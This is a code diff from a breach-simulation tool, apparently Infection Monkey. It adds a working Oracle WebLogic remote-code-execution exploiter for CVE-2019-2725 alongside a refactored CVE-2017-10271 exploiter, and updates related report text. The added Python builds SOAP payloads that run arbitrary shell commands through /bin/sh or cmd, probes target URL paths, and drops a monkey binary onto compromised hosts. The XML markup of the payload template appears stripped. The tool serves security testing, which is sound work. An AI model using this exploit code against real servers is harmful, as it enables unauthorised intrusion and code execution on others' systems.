diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
index 4c99f82b9..300f52f0e 100644
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -1,3 +1,48 @@
+from __future__ import print_function
+import threading
+import logging
+import time
+import copy
+
+from requests import post, exceptions
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
+
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+# How long server waits for get request in seconds
+SERVER_TIMEOUT = 4
+# How long should we wait after each request in seconds
+REQUEST_DELAY = 0.1
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
+REQUEST_TIMEOUT = 5
+# How long to wait for response in exploitation. In seconds
+EXECUTION_TIMEOUT = 15
+# Malicious requests' headers:
+HEADERS = {
+ "Content-Type": "text/xml;charset=UTF-8",
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+ "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+}
+
+
+class WebLogicExploiter(HostExploiter):
+
+ _TARGET_OS_TYPE = ['linux', 'windows']
+ _EXPLOITED_SERVICE = 'Weblogic'
+
+ def exploit_host(self):
+ exploiters = [WebLogic20192725, WebLogic201710271]
+ for exploiter in exploiters:
+ if exploiter(self.host).exploit_host():
+ return True
+
+
# Exploit based of:
# Kevin Kirsche (d3c3pt10n)
# https://github.com/kkirsche/CVE-2017-10271
@@ -5,57 +50,29 @@
# Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# CVE: CVE-2017-10271
-from __future__ import print_function
-from requests import post, exceptions
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
-from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+class WebLogic201710271(WebRCE):
+ URLS = ["/wls-wsat/CoordinatorPortType",
+ "/wls-wsat/CoordinatorPortType11",
+ "/wls-wsat/ParticipantPortType",
+ "/wls-wsat/ParticipantPortType11",
+ "/wls-wsat/RegistrationPortTypeRPC",
+ "/wls-wsat/RegistrationPortTypeRPC11",
+ "/wls-wsat/RegistrationRequesterPortType",
+ "/wls-wsat/RegistrationRequesterPortType11"]
-import threading
-import logging
-import time
-
-__author__ = "VakarisZ"
-
-LOG = logging.getLogger(__name__)
-# How long server waits for get request in seconds
-SERVER_TIMEOUT = 4
-# How long should be wait after each request in seconds
-REQUEST_DELAY = 0.0001
-# How long to wait for a sign(request from host) that server is vulnerable. In seconds
-REQUEST_TIMEOUT = 5
-# How long to wait for response in exploitation. In seconds
-EXECUTION_TIMEOUT = 15
-URLS = ["/wls-wsat/CoordinatorPortType",
- "/wls-wsat/CoordinatorPortType11",
- "/wls-wsat/ParticipantPortType",
- "/wls-wsat/ParticipantPortType11",
- "/wls-wsat/RegistrationPortTypeRPC",
- "/wls-wsat/RegistrationPortTypeRPC11",
- "/wls-wsat/RegistrationRequesterPortType",
- "/wls-wsat/RegistrationRequesterPortType11"]
-# Malicious request's headers:
-HEADERS = {
- "Content-Type": "text/xml;charset=UTF-8",
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
- }
-
-
-class WebLogicExploiter(WebRCE):
- _TARGET_OS_TYPE = ['linux', 'windows']
- _EXPLOITED_SERVICE = 'Weblogic'
+ _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+ _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
def __init__(self, host):
- super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+ super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey32.exe',
'win64': 'monkey64.exe'})
def get_exploit_config(self):
- exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+ exploit_config = super(WebLogic201710271, self).get_exploit_config()
exploit_config['blind_exploit'] = True
exploit_config['stop_checking_urls'] = True
- exploit_config['url_extensions'] = URLS
+ exploit_config['url_extensions'] = WebLogic201710271.URLS
return exploit_config
def exploit(self, url, command):
@@ -66,8 +83,8 @@ class WebLogicExploiter(WebRCE):
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
- print('[!] Connection Error')
- print(e)
+ LOG.error("Connection error: %s" % e)
+ return False
return True
@@ -196,6 +213,7 @@ class WebLogicExploiter(WebRCE):
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
+
def __init__(self, local_ip, local_port, lock, max_requests=1):
self.local_ip = local_ip
self.local_port = local_port
@@ -212,6 +230,7 @@ class WebLogicExploiter(WebRCE):
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
+
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True
@@ -224,3 +243,82 @@ class WebLogicExploiter(WebRCE):
def stop(self):
self._stopped = True
+
+
+# Exploit based of:
+# Andres Rodriguez (acamro)
+# https://github.com/rapid7/metasploit-framework/pull/11780
+class WebLogic20192725(WebRCE):
+ URLS = ["_async/AsyncResponseServiceHttps"]
+
+ _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+ _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
+
+ def __init__(self, host):
+ super(WebLogic20192725, self).__init__(host)
+
+ def get_exploit_config(self):
+ exploit_config = super(WebLogic20192725, self).get_exploit_config()
+ exploit_config['url_extensions'] = WebLogic20192725.URLS
+ exploit_config['blind_exploit'] = True
+ exploit_config['dropper'] = True
+ return exploit_config
+
+ def exploit(self, url, command):
+ if 'linux' in self.host.os['type']:
+ payload = self.get_exploit_payload('/bin/sh', '-c', command)
+ else:
+ payload = self.get_exploit_payload('cmd', '/c', command)
+ try:
+ resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
+ return resp
+ except Exception as e:
+ LOG.error("Connection error: %s" % e)
+ return False
+
+ def check_if_exploitable(self, url):
+ headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
+ res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
+ if res.status_code == 500 and "env:Client" in res.text:
+ return True
+ else:
+ return False
+
+ @staticmethod
+ def get_exploit_payload(cmd_base, cmd_opt, command):
+ """
+ Formats the payload used to exploit weblogic servers
+ :param cmd_base: What command prompt to use eg. cmd
+ :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+ :param command: command itself
+ :return: Formatted payload
+ """
+ empty_payload = '''
+
+
+ xx
+ xx
+
+
+
+
+ {cmd_base}
+
+
+ {cmd_opt}
+
+
+ {cmd_payload}
+
+
+
+
+
+
+
+
+
+ '''
+ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ return payload
diff --git a/monkey/monkey_island/cc/services/config_schema.py b/monkey/monkey_island/cc/services/config_schema.py
index 46129266c..4c4df247e 100644
--- a/monkey/monkey_island/cc/services/config_schema.py
+++ b/monkey/monkey_island/cc/services/config_schema.py
@@ -89,7 +89,7 @@ SCHEMA = {
"enum": [
"WebLogicExploiter"
],
- "title": "Oracle Web Logic Exploiter"
+ "title": "WebLogic Exploiter"
},
{
"type": "string",
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
index 72aeca574..4de4f1dbd 100644
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@@ -343,9 +343,7 @@ class ReportPageComponent extends AuthComponent {
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
CVE-2017-5638) : null }
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
- Oracle WebLogic servers are vulnerable to remote code execution. (
- CVE-2017-10271) : null }
+ Oracle WebLogic servers are susceptible to a remote code execution vulnerability. : null }
{this.state.report.overview.issues[this.Issue.HADOOP] ?
Hadoop/Yarn servers are vulnerable to remote code execution. : null }
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
@@ -889,16 +887,15 @@ class ReportPageComponent extends AuthComponent {
generateWebLogicIssue(issue) {
return (
- Install Oracle
- critical patch updates. Or update to the latest version. Vulnerable versions are
- 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+ Update Oracle WebLogic server to the latest supported version.
Oracle WebLogic server at {issue.machine} ({issue.ip_address}) is vulnerable to remote code execution attack.
+ className="label label-info" style={{margin: '2px'}}>{issue.ip_address}) is vulnerable to one of remote code execution attacks.
- The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
- (subcomponent: WLS Security).
+ The attack was made possible due to one of the following vulnerabilities:
+ CVE-2017-10271 or
+ CVE-2019-2725
);